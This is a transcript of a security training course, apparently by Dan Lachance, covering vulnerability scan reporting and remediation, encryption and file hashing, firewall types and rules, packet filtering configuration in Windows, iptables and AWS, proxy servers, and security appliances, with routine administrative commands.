Software Audit category and expand Ports, I can see the open ports here. [He clicks the Open TCP Ports
subnode under the Network and Software Audit node of the 192.168.1.94 address and its content is displayed
in the Scan Results Details section.] So port 80 for a web server. Because it's a Windows machine with file
and print sharing, I see ports 135 and 139. But as I go further down, I can also see that port 9090, again, is
listed.
Now, this is a specific packet sniffer tool. And it could spell problems. Because it could be some kind of a
Trojan listener. Or it could be some kind of a back door or spyware. So this should be setting off alarm bells.
Because we might say that that is a workstation that shouldn't be running a web server, let alone some other
remote packet sniffer on port 9090. Now, when you're looking at the results of a scan, of course you're going to
want to save it to make sure it's available for historical purposes or over time so that you can start to think
about your remediation actions. So of course, in this tool, on the upper left drop-down arrow icon [He clicks
the Main Menu icon at the top of the GFI LanGuard 2014 window. A list of options appears that includes the
File option.] and under File, [A flyout appears that includes the Save Scan Results and Load Scan Results
from options.] I could choose to save the scan results. And often, it saves it in a format such as XML or CSV,
or even to a database with some tools. And in the future, you can load the scan results. However, let's take a
look at a couple of other options after having run a vulnerability scan. So under the Remediate tab in this
particular tool, it's showing me things that really need attention. [The Remediate tabbed page includes the
navigation section on the left. It contains the Entire Network node, which is selected by default. Its content is
displayed in the section on the right. It includes two tabs, Remediation Center and Remediation Jobs. The
Remediation Center tabbed page includes a section that is titled List of missing updates for current
selection.] Now, on the left, I can choose specific hosts as a result of the scan. But here I've got Entire
Network selected, so it applies to all of them. And it's talking about a lot of Windows updates and Service
Packs that really should be applied. [The list includes the Critical Update and Service Pack nodes.] So for
example, under Critical Update, there are two updates here, such as one here for Server 2012 R2. And if I
expand it, I can see which hosts are missing it. Now, notice, I do have the option to remediate. Which means,
in this case, apply the updates. So not only is this tool doing a vulnerability scan, but it gives me the ability to
do something about what was found. If I were to go under the Reports tab in this particular tool, [The Reports
tabbed page includes the navigation section on the left. It contains the Entire Network node, which is selected
by default. Its content is displayed in the section on the right. It includes two tabs, Settings and Search. The
settings tabbed page includes the Reports section.] there are numerous reports that are available. And you can
run them based on the results of your scan. So for example, maybe I'll take a look at the Network Security
Overview report. [This node is selected by default in the Reports section. As a result, the section adjacent to
the Reports section is titled Network Security Overview.]
Now, on the left, again, I've got the Entire Network selected. So everything that was found through the result
of my scan settings. And if I generate the report by clicking the Generate Report button, [This button is present
in the Network Security Overview section.] let's see what we get. [Another tab, Network Security Overview,
gets added in the content section.] We should have some kind of a general security overview report based on
all of the machines that were scanned when we conducted our vulnerability assessment. Okay, so after a
minute, we've got our Network Security Overview report. And if we scroll down here, it's really nicely done.
We can see we've got nice, colorful charts. Now, it's not about the colors or the pretty pictures, it's about what
they represent. So our vulnerability level overall is flagged here as being medium. That is not good. We can
also see a pie chart here that shows us our vulnerability distribution in terms of high, medium, and low. [This
information is displayed under the Network Security Overview section.] As we scroll further down, we start to
see a breakdown. So apparently, we have no firewall issues out of what was scanned on our network. But we
have a lot of missing updates, which is a problem. [This information is displayed under the Security Sensors
section.] So as we scroll further down, we could read more and more about that report. So we've got all kinds
of great things that we can do with this. Now, you also have the option of choosing the format that you want to
use for an attachment by sending this through email or by saving it. So if I click the little icon with the floppy
disk, I see that the format is set to PDF. [These icons are present at the top of the Network Security Overview
tabbed page.] So if I were to actually click right on the icon itself, it gives me PDF Export Options. [The PDF
Export Options dialog box opens.] So we can save the report in various ways. Of course, you've also got
options available towards the upper left here, where you can search through the report for something specific
or actually print it on paper. Now, there are many other reports. We're not going to go through all of them. But,
for instance, if we're working with card holder data, like debit and credit cards, then we would be very
interested in PCI DSS compliance. So here, maybe I'll choose PCI DSS Requirement 1.2 - Open Ports. [He
selects the PCI DSS Requirement 1.2 - Open Ports subnode under the PCI DSS Compliance Reports node in
the Reports section of the Settings tabbed page. As a result, the title of the section adjacent to the Reports
section gets changed to PCI DSS Requirement 1.2 - Open Ports.] And I'll click Generate Report on the
right. [This button is present in the PCI DSS Requirement 1.2 - Open Ports section. Another tab, PCI DSS
Requirement 1.2 - Open Ports, gets added in the content section.] So really, these kinds of vulnerability
scanning tools have a lot of reporting capabilities. It takes a lot of the manual grunt work away from us, so we
can spend more time focusing on actually doing what we should be doing, securing the network.
So as I scroll down through here, I have a listing per each computer for TCP and UDP ports. Now, a -1 under
Process ID means it's not even open on that host. [He points to the TCP Ports and UDP Ports sections under
the PCI DSS Requirement 1.2 - Open Ports tabbed page.] But as we scroll further down, in this case, I can see
the computer is CM001. We've got a number of open TCP ports. And that might be required legitimately. But
it's a great report that quickly shows us the port utilization, in this case, for PCI DSS compliance.
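Before acting on a finding like the TCP 9090 listener mentioned earlier, it can help to double-check it from another host. Here's a small sketch with nmap (assumed to be installed; the IP address is the one from this demo):
# probe the flagged ports and try to identify the service actually listening behind each one
nmap -sV -p 80,135,139,9090 192.168.1.94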
Objectives
[Topic title: Vulnerability Remediation. The presenter is Dan Lachance.] In this video, I'll discuss
vulnerability remediation. It's one thing to identify vulnerabilities, but it's another to remove or mitigate them.
We want to address identified vulnerabilities before malicious users can exploit them, and we might be required to do this for
legal or regulatory compliance reasons. So ideally, we'll have an automated schedule by which we get
vulnerability scan results so that we can identify these vulnerabilities. Manual remediation is possible. So for
example, if we discover that Remote Desktop is enabled on crucial Windows servers and we don't want it
enabled, then we could manually turn off Remote Desktop on each and every server that has that configuration.
Of course, enterprise class tools will always have a way to automate this remediation. Now it can also include
things like missing software patches, security misconfigurations, even the detection of malware where we've
configured it to automatically quarantine or remove the offending software. Vulnerability remediation allows
us to prioritize our vulnerabilities. We can then determine the business impact if those vulnerabilities were to
be exploited. That impact could be business process interruption, or something different such as degraded
IT system performance. Sandbox testing allows us to have a controlled environment to observe the
effectiveness of a remediation.
So when the IT technicians are testing vulnerability remediation, whether it be manual or automatic, this
should be done in a controlled environment. Often, it's done in a virtualized environment. Whether you've
already got that available on premises on your own equipment, or whether you're doing it in the cloud where it
takes only a few moments to spin up virtual machines to test things. When we implement remediation, we have
to think about remediation inhibitors. Some inhibitors include cost; it might be too expensive to pay for the
time for someone to get a configuration such as auto remediation up and running. There's also
complexity. But really, like anything worth doing, if you take the time to do it properly from the beginning,
to do it right the first time, configuring auto remediation is not that complex.
Now there are laws and regulations that might stipulate that we must enable auto remediation.
As an example, consider a configuration baseline here in Microsoft System Center Configuration
Manager. [The Baseline tabbed page of the System Center Configuration Manager window is open. It includes
the Assets and Compliance section.] A baseline contains numerous settings. In this case, we're checking
registry settings for a line of business apps. Now if I were to right-click on that configuration baseline, and if I
were to choose Deploy to apply it to a collection of devices, [The presenter right-clicks the Check client
Custom LOB App settings subnode under the Assets and Compliance section and selects the Deploy option
from the shortcut menu. As a result, the Deploy Configuration Baselines dialog box opens.] one of the things I
would notice is I have the option to remediate noncompliant settings when supported. [The Remediate
noncompliant rules when supported checkbox is present in the Deploy Configuration Baselines dialog
box.] So for instance, if we've got specific settings for an application, and maybe those are simply registry
entries, then we could auto-remediate that if it would make that application more secure as an example. Now to
finish this example, I would have to specify a collection down here by clicking the Browse button of users or
computers, [The Browse button is present adjacent to the Collection field under the Select the collection for
this configuration baseline deployment section. As a result, the Select Collection dialog box opens. It includes
a drop-down list box.] in this case devices [He selects the Device Collections option in the drop-down list
box.] where I want this done. So maybe I'll choose the All Systems collection. So we can deploy our
configuration baseline with auto-remediation to the devices of our choosing. On a larger network, it's a good
idea to have some kind of central way to deploy remediations, even if that's in the form of updates, as opposed
to going to each system one at a time. So we also need a way to track progress and run reports on either the
success or failure of implementation of remediation solutions.
So, over time, we can also run reports or future scans to track the effectiveness of any fixes that have been
applied. And we can update organizational security policies, or documentation, even material used for new
user onboarding training, as required.
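As a small sketch of centrally scripted remediation, rather than visiting each system one at a time, something like the following could push missing patches to a set of Debian-based servers (the hostnames are hypothetical, and SSH key access is assumed; enterprise tools such as SCCM achieve the same result through policies and deployments):
# apply outstanding updates on each server in the list
for host in web01 web02 db01; do
  ssh root@"$host" 'apt-get update -qq && apt-get -y upgrade'
done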
Objectives
Exercise Overview
[Topic title: Exercise: Describe Ways of Reducing Vulnerabilities. The presenter is Dan Lachance.] In this
exercise, you'll begin by explaining the difference between symmetric and asymmetric encryption.
Then after that you'll explain the purpose of Identity Federation, followed by describing the contents of a PKI
certificate. And then it's on to the action, where you'll compute a file hash using Windows. And you'll do the
same thing except you'll compute the file hash using the Linux operating system. At this point, pause the
video, perform each of the exercise steps and then come back to view the solutions.
Solution
Symmetric encryption uses the same key for encryption and decryption.
The key is called a shared secret. But it doesn't scale well because it's difficult to securely transmit this key to
multiple users. With asymmetric encryption, two keys are used, one for encryption and one for decryption.
Unique, mathematically related public and private key pairs are issued to users, devices, or applications, where
the public key is used to encrypt and the private key is used to decrypt. Identity Federation allows us to use a
centralized identity provider that supports single sign-on. Applications have to be configured to trust the
identity provider. And likewise, the identity provider must be configured to trust applications. After successful
authentication, the result is a digitally signed security token from the identity provider. Applications verify that
signature authenticity before allowing resource access. So Identity Federation removes the need for
multiple sets of credentials. Among other items, a PKI certificate will contain the digital signature of the
issuing Certificate Authority.
It will include the subject name, which might be an email address or the URL of a web site. It will include a
public key (but not the private key, which is kept separately), key usage details, as well as an expiry date. We can open up PowerShell in Windows
to generate a file hash of a file. We can use the get-filehash cmdlet followed by the name of the file.
Here, I've got a text file called Project1.txt. [He executes the get-filehash .\Project1.txt command.] Notice that
we've got the hash visible here. Any changes made to the file will result in a different hash value if we run the
get-filehash cmdlet in the future. In the Linux environment, I can use the md5sum command to generate a
file hash. Here I've got a file called log1.txt. So I'm going to type md5sum log1.txt. [He executes this
command in the root@kali command prompt window.] And here we can see the resultant hash, which will be
different if the contents of log1.txt change.
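To tie the symmetric versus asymmetric distinction back to commands, here's a hedged OpenSSL sketch; the file and key names are made up for illustration, and the openssl tool is assumed to be available:
# symmetric: the same passphrase, the shared secret, both encrypts and decrypts
openssl enc -aes-256-cbc -in secret.txt -out secret.enc
openssl enc -d -aes-256-cbc -in secret.enc -out decrypted.txt
# asymmetric: generate a key pair, encrypt with the public key, decrypt with the private key
openssl genrsa -out private.pem 2048
openssl rsa -in private.pem -pubout -out public.pem
openssl pkeyutl -encrypt -pubin -inkey public.pem -in secret.txt -out secret.rsa
openssl pkeyutl -decrypt -inkey private.pem -in secret.rsa -out decrypted.txt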
Table of Contents
After completing this video, you will be able to recognize the purpose of various types of firewalls.
Objectives
[Topic title: Firewalling Overview. The presenter is Dan Lachance.] In this video I'll do a firewalling
overview. Firewalls come in either hardware or software form and their general purpose is to control the flow
of network traffic into or out of a network or even an individual host.
Now we can configure our firewalls with on-premises equipment or we can do it, if it's supported by a public
cloud provider, in the cloud. Firewall solutions from Palo Alto Networks also include virtual machine
appliance firewalls that are pre-installed and require only custom configuration. Now stateful firewalls are
designed to track connection state, or sessions, as opposed to each individual packet within the session. Now
this is considered more secure than a stateless firewall which does just that, it tracks each individual packet and
does not have the capability to track a session. All computing devices should really have a firewall solution
installed. This includes servers, desktops, laptops, tablets, and of course, smartphones. A packet filtering
firewall is one that examines packet headers as seen pictured here on the right-hand side of the screen. [The
following information is displayed: Source port: https (443), Destination port: 55940 (55940), [Stream index: 38],
Sequence number: 91765 (relative sequence number), Acknowledgement number: 19197 (relative ack number),
Header length: 32 bytes, Flags: 0x10 (ACK),
Window size: 309.] So for instance, in this packet header, we see a source and a destination port, a sequence
number, an acknowledgement number, which means it must be a TCP header. We see things like header
length, and so on. So packet filtering firewalls can look at many of these types of fields to decide whether
traffic is allowed or denied. So by looking at things like the IP protocol ID, source and destination IP address,
as we see in our picture here on the screen, the source and destination port number, maybe the ICMP message
type or additional IP options and flags. A web application firewall is a little bit more detailed because it's
designed to really dig a little bit deeper in the packet payload beyond just the headers.
It's often referred to as a WAF, a W-A-F, and it is specific to HTTP connections, whereas packet filtering
firewalls can look at any type of traffic. Another type of firewall is a proxy server. It's designed to retrieve
Internet content for internal clients that request it, so it's really masking or hiding the true identity of those
requesting clients. Another benefit of a proxy server is content that is retrieved can be cached to speed up
subsequent requests. A reverse proxy server listens for connection requests, for example from Internet clients
for a given network service such as a web server. So for instance, the proxy server might listen for TCP port 80
web site connections. And then what it will do is take those incoming connections from the Internet and
forward them to an internal host, a web server, listening elsewhere, ideally on a different port number. But it
doesn't have to be a different port number. Address translation is another way to firewall where it hides the
internal identity of hosts. However, routing needs to be enabled on your translation device and the hosts that
need to use that translation device. For example, if you're going to be using port address translation to get a
bunch of clients out on the Internet, they need to point to that translation device as their default gateway.
Network address translation, often called NAT, means that we've got multiple external-facing public IPs that
each map to a different internal private host IP. So we're protecting the true identity of those internal hosts,
while allowing incoming connections from the outside. Port Address Translation is often referred to as PAT.
This is where we can allow multiple internal clients to access the Internet through a single public IP address
configured on the PAT device. We then have to consider encrypted traffic when thinking about firewalls. So,
for example, if packet headers are encrypted, firewalls won't be able to read them. Now, there are some
exceptions.
Some firewalling tools will allow you to inject some kind of a certificate or key to decrypt transmissions. But
for the most part, when we talk about encrypted network traffic, it's not the headers that are encrypted. Usually
we're talking about the payload or the actual data that is encrypted. We should also consider the use of a
variety of firewall vendor solutions to increase security. So for example, if one of our firewalls gets
compromised by a malicious user they won't be able to use that same exploit against another firewall in the
enterprise because we would be using a different vendor's solution. We should also consider how we're going
to have a central standardized way to configure and deploy firewall settings to numerous devices. We might do
this through scripts, so whether it's a Linux Shell Script or a Windows PowerShell Script. We might even use
PowerShell Desired State Configuration, or DSC, to configure firewall settings on multiple devices, including
Linux. Or if you're in an Active Directory environment, you might consider the use of Active Directory and
group policy to essentially configure the Windows firewall for Windows devices.
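Tying this back to the address translation discussion from a moment ago, here's a minimal sketch of how port address translation is often implemented on a Linux gateway using iptables. This is an illustration only, not something shown in the demo, and it assumes eth0 is the Internet-facing interface:
# enable IP routing so the gateway will forward client traffic
sysctl -w net.ipv4.ip_forward=1
# rewrite outbound traffic so it appears to come from the gateway's public address
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Clients would then point to this gateway as their default gateway, as described above.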
After completing this video, you will be able to recognize how firewall rules are created based on what type of
traffic should or should not be allowed.
Objectives
recognize how firewall rules are created based on what type of traffic should or should not be allowed
[Topic title: Firewall Rules. The presenter is Dan Lachance.] In this video I'll talk about Firewall Rules.
Firewall Rules control network traffic flow. Traffic is either allowed or denied on a per-network interface
level. A firewall appliance, whether it's a server, physical or virtual, with multiple network interfaces or a
router, is going to have more than one interface, so we then can control the rules and tie them to a specific
interface. So the traffic can be coming into an interface or it could be leaving an interface, and when we
configure Firewall Rules, depending on the product that we're using, we'll have to specify that distinction.
Firewalls can be network based, so we have to think about the placement of the firewall appliance, so that it
can see all the traffic that it potentially would allow or deny. And of course, every host on the network, be it a
server, a laptop, or a smartphone, and so on, should have a host based firewall configured, in addition to our
network based firewall solutions. With Firewall Rules we should have a deny all traffic by default rule.
Then we would add rules to allow traffic only as we need them. So for instance if we need to allow HTTP
traffic then we could add a rule to allow that. But if any packets come in through the firewall that don't match
that HTTP rule then our deny all by default would kick in. Rules are processed using a top down approach. So
the first matching rule, so if there's some kind of criteria that matches what's in a packet, it gets executed and
no further rules get checked. So the last rule in your list of rules should be a deny all. Some products will actually display this implicit deny rule because it's there automatically, whereas others won't display it even though it is still in effect.
Here on the screen we see some examples of inbound rules. [A table with six columns and four rows is
displayed. The column headers are Allow/deny, Protocol type, Source, Destination, Port, and
Interface.] Where we get to decide in the left most column whether we are allowing or denying traffic. Notice
our last rule at the bottom denies all protocols from all sources going to all destinations for all interfaces.
However, our first rule allows TCP traffic from a specific source subnet of 172.16 with a 16 bit subnet mask.
And it allows that type of traffic to a specific host, in this case 172.16.0.56 for port 22 which is used for SSH
remote administration. And that's allowed on our firewall device through interface Ethernet zero.
Now we can also see the second example allows TCP traffic from all sources to all destinations as long as the
port number is 443, so HTTPS secured web traffic. And that again is tied to interface eth0. Our third rule
allows UDP traffic from any source to a specific destination going to port 53. Now if you recall, DNS client
queries are sent to UDP port 53 on the DNS server. So this is allowing DNS server queries from clients to
reach host 172.16.0.100. We should also consider whether or not we're going to log firewall actions, whether
packets are accepted or dropped because they don't meet the conditions that were specified in rules. If we're
going to turn on logging, then we probably want to turn on log forwarding so that our log information is stored
on another host as well. So if the firewall appliance itself gets compromised, the local logs can't be trusted of course, but we've got a copy elsewhere on a trusted host. In our logs we also have to decide whether or not we
want to see IP addresses for the data that we're logging to the firewall. Or, whether we want to do reverse DNS
name lookups to see the actual DNS names of the hosts connecting through the firewall. Now in many cases
you probably don't want to use reverse DNS name lookups while the log information is being generated,
because it's a little too resource intensive and takes time to do the reverse lookups. So instead, another option is
to have IP addresses of hosts logged in the firewall logs. And then if you need to when you're analyzing the
logs later, you can do the reverse DNS name lookups to get the names of the hosts if that's helpful. And that
could be a manual or an automated process. In this video we talked about Firewall Rules.
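As a footnote to those on-screen rules, here's a rough sketch of how the same inbound rules could be expressed with the Linux iptables command. The on-screen example isn't necessarily a Linux device, so treat this as an illustration of the logic rather than the actual product configuration:
# allow SSH from the 172.16.0.0/16 subnet to host 172.16.0.56 on interface eth0
iptables -A INPUT -i eth0 -p tcp -s 172.16.0.0/16 -d 172.16.0.56 --dport 22 -j ACCEPT
# allow HTTPS from any source through interface eth0
iptables -A INPUT -i eth0 -p tcp --dport 443 -j ACCEPT
# allow DNS client queries to the DNS server at 172.16.0.100
iptables -A INPUT -p udp -d 172.16.0.100 --dport 53 -j ACCEPT
# deny everything else by default
iptables -A INPUT -j DROP
Because rules are processed top down, the final DROP rule only applies to traffic that didn't match one of the allow rules above it.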
[Topic title: Packet Filtering Firewalls. The presenter is Dan Lachance.] In this video, I'll discuss packet
filtering firewalls. Packet filtering firewalls are also called Layer 4 firewalls.
This is because they are designed to examine packet headers, specifically things like UDP and TCP headers,
which map to Layer 4 of the OSI model. Therefore, a packet filtering firewall cannot examine the packet payload. It can't look at the actual data, such as a specific URL that the user is connecting to, or a specific HTTP GET request. So restrictions based on specific websites, or on data within packets, are simply not possible with packet filtering firewalls. Packet filtering firewalls can be stateless, where each individual packet
is seen as a separate connection. Also, a packet filtering firewall might be stateful, where it tracks packets
within a session.
When we configure a packet filtering firewall, we allow or deny traffic based on criteria. Which includes
things such as an IP protocol ID, which implies what type of packet this really is. Or a source and destination
IP address that specifically would apply to Layer 3 of the OSI model. We might also have a source and
destination port number, an ICMP message type, IP options and flags, and so on. Pictured on the screen, we've
got a red arrow pointing to the headers within a packet capture. [Dan refers to the following information
displayed on screen: Frame 91 (453 bytes on wire, 453 bytes captured), Ethernet II, src: 90:48:9a:11:bd:6f
(90:48:9a:11:bd:6f), Dst: 14:cf:e2:9f:9b:e7 (14:cf:e2:9f:9b:e7), Internet Protocol, src: 192.168.0.8
(192.168.0.8), Dst: 192.229.163.25 (192.229.163.25), Transmission Control Protocol, src port: 57683
(57683), Dst Port: http (80), seq: 400, Ack: 56918, Len: 399, Hypertext Transfer Protocol. ] The headers
begin with the Ethernet II header, which is containing information such as the source and destination MAC
address. We then see the Internet protocol or IP header, which, among other things, contains the source and
destination IP address. We can also see the Transmission Control Protocol header here in our screenshot, the
TCP header. Which, among other things, shows us the source and destination port for the connection, as well
as things like sequence and acknowledgement numbers. Finally, we can also see the Hypertext Transfer Protocol
header, which is selected.
But down at the bottom in this packet capture we see the actual hexadecimal representation of that data, or
payload, on the left, and the ASCII equivalent on the right. So a packet filtering firewall will not be able to go
in and read that payload as we see it at the bottom of the screen. So again, it can't take a look at a file that a
user requested from a website. So a packet filtering firewall then really applies to Layers 3 and 4. So when we say it's a Layer 4 firewall, it also covers the layers underneath it, such as Layer 3. It can deal with protocol types, IP addresses,
port numbers, and so on. In our example on the screen we've got 3 firewall rules. The first rule is an SSH TCP
port 22 rule, to allow SSH remote administration traffic. [A screenshot of a web page is displayed. The page
displays a table with many columns and three rows. Some of the column headers are Rule#, Type, Protocol,
Port Range, Source, Allow/Deny. The table displays three types of rules. The Add another rule button is also
displayed.] We can see that we can specify a source, which in this case is an entire subnet, 172.16.0.0/16. And
of course, our rule is set to allow. Below it we are allowing HTTPS port 443 traffic from any source. And our
last rule here is denying all traffic from all sources. Common packet filtering firewall products include
configuring network access control lists, or ACLs, on your router, whether you're using a Juniper or Cisco
router. You can also configure the Windows firewall solution, or you could use the Linux and Unix iptables
command. Or any newer derivative, such as the firewalld daemon. Or you might use other tools, such as
Check Point Firewall-1, the list goes on, and on, and on. In this video we discussed packet filtering firewalls.
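For instance, with the firewalld daemon just mentioned, a simple port-based allow rule might look like the following. This is a sketch that assumes firewalld is installed and you're working with the default zone:
# allow inbound SSH on TCP port 22 and make the rule persistent
firewall-cmd --permanent --add-port=22/tcp
# reload so the permanent rule takes effect
firewall-cmd --reload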
[Topic title: Configure a Packet Filtering Firewall. The presenter is Dan Lachance.] In this video, we'll take a
look at how to go about configuring a packet filtering firewall. There are plenty of packet filtering firewall
solutions out there. Some are newer. Some are older. Some are command line based. Some are GUI-based
through a web interface. It just goes on and on. We're going to start by taking a look here at the built-in
Windows Server Operating System Firewall. So I'm going to go to my Windows Start menu and type in fire.
And I'm going to click on Windows Firewall with Advanced Security. Here in this tool, I can see on the left,
I've got a number of inbound rules, as well as a number of outbound rules to control traffic leaving this server.
If I go back to Inbound Rules, you'll notice that the icon to the left of some of the rule names looks like a green
circle, which means it's a rule that's enabled. Whereas others look like a golden padlock, which means it's a
rule that only allows access if there's some kind of a secured connection. Either using IPsec or maybe the rule
is configured to only allow connections from certain user accounts or computers. Any rules that have a grayed
out icon are disabled. So we're going to go ahead and right-click on Inbound Rules on the left and choose New
Rule. We're going to build a rule to allow inbound SSH traffic.
Now there's not an SSH service by default in the Windows Server OS, but certainly we could install one. So
let's assume that we've got one installed and we want to allow connections to it. So we're going to go ahead
and choose Port. We could also alternatively have built a firewall rule based on a program or from the
predefined list of common things that are done. Or we could build a custom rule. Here it's going to be a port.
So I'll choose that and I'll click Next. We know that SSH uses TCP port 22. So I'm going to go ahead and
specify that specific port. But notice in the example, I could have a comma separated list of ports I want to
allow through this rule. Or a range of ports with a starting and ending range and, of course, it is inclusive. So
I'm going to go and click on Next.
I want to allow the connection. Although I could choose allow the connection if it's secure. Again, I could do
that for IPsec or to make sure that only certain user accounts or SSH connections can only come from a certain
computers. I could also block the connection. But in this case I want to allow it. So I'll go ahead and click
Next. In Windows, we have various profiles that apply, depending on if the user is connected to an Active
Directory domain network, a private network, or public.
So what I want to do here is make sure that this only applies when people have their computers at work. Or in this case, since it's a server, it would never be on a different network like at Starbucks or on a home private network. So, I'll go ahead and click Next, and I'm going to call this Allow inbound SSH. And I'll go ahead and click
Finish. And we can see now in the list we've got an active rule, it's got the green circle with the white check
mark, called Allow inbound SSH. Now of course we could do this from the command line using PowerShell cmdlets if we really wanted to. However, let's take a look at how we would configure a simple packet
filtering rule on the Linux platform. Most Linux distributions support the old iptables command as a way of
configuring packet filtering firewall rules. Although there are other options, including graphical ways of
configuring tools. Here we're going to type iptables -L for list. Here we can see that our input chain has a
policy of accept. So it's going to accept everything from anywhere going to anywhere on this host. What we're
going to do is we're going to make sure it only allows SSH. So, I'm going to type iptables -A. I want to add an
INPUT rule; -p specifies the protocol, which is tcp. I'll add -m tcp to match TCP, and the destination port or --dport is going to be 22, because that's what SSH uses. So then -j ACCEPT.
I don't want to drop, I want to accept that traffic. And I'm also going to add another rule here. So iptables -A in
the INPUT chain -j DROP. Basically all I want to allow is inbound SSH and drop everything else. So now if I
type iptables -L for list I can now see that we're allowing inbound SSH for the TCP destination port and then
dropping everything else. Let's test to see if that's actually working correctly. Before we test this let's type
ifconfig to see what our IP address is. And here we can see clearly it's 192.168.1.91. Okay, let's go test it. From
a different computer I'm going to ping 192.168.1.91 and notice of course we don't get a response. Because that
traffic should be dropped. The only thing allowed into that Linux host is SSH. So naturally we're going to try
to use PuTTY to open up an SSH session to that same IP address. So we can see we're going to open up an
SSH session on Port 22 on that same IP address. So I'll go ahead and click Open.
And after a moment it asks me to log in. So I'm going to go ahead and specify the appropriate credentials and
we are in. Again if we do an iptables -L for list, we can see the rules that are in place to make this happen.
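For reference, the commands typed in this Linux portion of the demo were roughly the following, and depending on your account you may need to prefix each with sudo:
# list the current rules
iptables -L
# allow inbound SSH on TCP destination port 22
iptables -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
# drop everything else arriving at this host
iptables -A INPUT -j DROP
# verify the rules, then check the host's IP address before testing
iptables -L
ifconfig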
Another type of packet filtering solution is in the cloud. Here I'm connected to my Amazon Web Services
account where I'm viewing one of my VPCs or Virtual Private Clouds called PubVPC1. A VPC is just a
network that you've defined in the cloud. But what's interesting is that you can define a network ACL or
Access Control List for each VPC in the Amazon Web Services Cloud. The same types of things are possible
with other cloud providers like Microsoft Azure as well. So having that VPC selected here in the list, I'm going
to go down and click on the link next to network ACL. That's going to open up another window where we can
actually start to work with the packet filtering rules for this network, which actually exists in the cloud.
Having my network ACL selected down below I can see the Inbound Rules tab where we have a list of
inbound rules. Which in this case is allowing traffic from anywhere into the network. In the same way, we've
got Outbound Rules to control traffic leaving this cloud network. So, I'm going to go back to the Inbound
Rules tab and click the Edit button. What we want to do here is change our first rule to allow, not all traffic,
but in our example, only SSH port 22 traffic. And I'll leave the source as 0.0.0.0/0 which means from
anywhere. Now, we don't want this second custom rule being built here. So, I'll click the x to remove that and
I'll click Save. Now, after a moment, that network ACL for that cloud virtual network is now saved. And we
can see down below that we are allowing inbound SSH traffic but blocking everything else. Because the
second rule is a DENY rule. In this video, we learned various ways to configure packet filtering firewalls.
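As mentioned in the Windows portion of this demo, the same inbound SSH rule could also have been created from PowerShell. Here's a minimal sketch using the New-NetFirewallRule cmdlet, where the display name is arbitrary and the profile matches what was chosen in the wizard:
# create an inbound allow rule for TCP port 22, scoped to the Domain profile
New-NetFirewallRule -DisplayName "Allow inbound SSH" -Direction Inbound -Protocol TCP -LocalPort 22 -Action Allow -Profile Domain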
[Topic title: Proxy Servers. The presenter is Dan Lachance.] In this video, I'll talk about proxy servers. A
proxy server eliminates direct connectivity between internal clients and Internet resources and, depending on the type of proxy server, between Internet clients and internal resources like a protected web server. So
really, we're talking about protecting the host's identity, where outgoing traffic appears to come from the
proxy.
So that way, the true internal IP address of the host is never known. So, we must configure a proxy server for
specific applications. So, we would have HTTP proxies, FTP proxies, and so on. Transparent proxies don't
require any client configuration. So in other words, as long as the client is configured with the default gateway,
that device, the default gateway, would normally be their proxy server that they connect through to request
content from the Internet. But again, with a transparent proxy, you don't have to go, for instance, into your web
browser and tell it the address and port number of the proxy server. Proxy servers are designed to retrieve
Internet content for internal requesting clients. And that content can be cached to speed up requests for the
same stuff later.
However, the great thing about this is that the internal client identity is never revealed. Now, proxy servers
examine not only packet headers, like a packet filtering firewall, but they also can examine the payload. So for
instance, that means the proxy server would be able to block connections to facebook.com even outside of
specific hours. Now, on a proxy server device, we want to make sure IP routing is disabled. Because we don't
want things being routed out to the Internet at the IP level, thereby bypassing the proxy server. We want the
proxy server to have to examine everything. Proxy servers are sometimes also called caching servers. And it
really depends on how the proxy server gets configured as to whether or not it's configured to cache content.
Proxy servers can also be configured to prefetch Internet content on a scheduled basis. The result of this is that
it speeds up access for that content when clients actually request it. So for instance, if we know that every
morning users need to see information from certain webpages, we can have that pre-cached to speed up their
experience. But we also have to consider the static and dynamic nature of the cached content.
If it's stock quotes that change all the time, we probably wouldn't want to prefetch that type of streaming
information. We can also configure cache aging timers, which is often called the Time To Live or TTL. So,
once data is expired after it's been cached, that cached content gets removed from the server. A reverse proxy
server listens for connection requests for a given network service. So for example, it might listen for TCP port
80 web site connections. Incoming connections to the reverse proxy server get forwarded to an internal host
elsewhere. So for instance, we might forward requests to a protected web server elsewhere listening on either
port 80 or some other port. Normally, reverse proxy servers are placed in a demilitarized zone for publicly
accessible services.
So, it protects the true identity of the internal host offering that network service and it's completely transparent
to external users. They think they're connecting to the real thing. So, this is great because the fact that we're
even using a reverse proxy isn't even known by client devices. There are public proxies that are available out on
the Internet that can anonymize Internet user connections. Now, this could be used for example to allow the
bypassing of normal surfing restrictions, such as media content that is only served within certain countries.
Well, using a proxy anonymizer on the Internet, you can make it look like you're coming from another country.
Now, I'm not suggesting that that's something you should do. It may or may not be legal where you are, but it
is possible. It's part of the technology that's out there. Another way a public proxy might be used is so that we
could use social media that's normally prohibited at school or at work. But again, if the rules are in place,
there's usually a good reason, especially at work. So, in essence what it really means is that the Internet user
appears to be initiating connections from a different location. Common proxy server products include Squid,
WinGate, the Cisco Web Security Appliance, and Check Point's Security Gateway. In this video, we talked
about proxy servers.
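To give a sense of what proxy configuration looks like in practice, here is a minimal sketch for Squid, one of the products just mentioned. The subnet and listening port are assumptions for illustration, not recommendations:
# define the internal clients allowed to use the proxy
acl localnet src 192.168.1.0/24
http_access allow localnet
# deny everyone else
http_access deny all
# the port the proxy listens on for client connections
http_port 3128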
After completing this video, you will be able to explain the purpose of a security appliance.
Objectives
[Topic title: Security Appliances. The presenter is Dan Lachance.] Firewalls are used to control network
traffic flow by either allowing or denying traffic based on configured criteria. But what about using more than
one type of firewall at once? In this video, we're going to address that by talking about security appliances.
A security appliance is a type of firewall and in some cases it might be specialized. So for example, it might be
focused on intrusion prevention. But at the same time, a security appliance might also be an all-in-one multiple
capability firewall. So that could come in hardware form, where it might be rack-mounted equipment in a
server room or a data center. Or it could come in software form, where we might use various preconfigured
virtual machines that are pretty much ready to go, just a little bit of tweaking is required to get them running as
a security appliance. Of course, you could install your own physical or virtual machine and configure multiple
firewall products manually.
Security appliances, because of their nature, could be an all-in-one firewall, so their capabilities are quite far
reaching. They will have the ability to perform stateful packet filtering with the configuration of network
ACLs. They will have proxying capabilities. In some cases, also reverse proxying. They'll be able to filter
traffic at layer seven of the OSI model, application specific. They might also serve as a VPN appliance, to
allow VPN connections into a private network. A security appliance could also have intrusion detection and/or
prevention capabilities. It might also check for malware, and it might have antiphishing built in. It might even have video surveillance capabilities built in. So as you can see, a security appliance really could be all
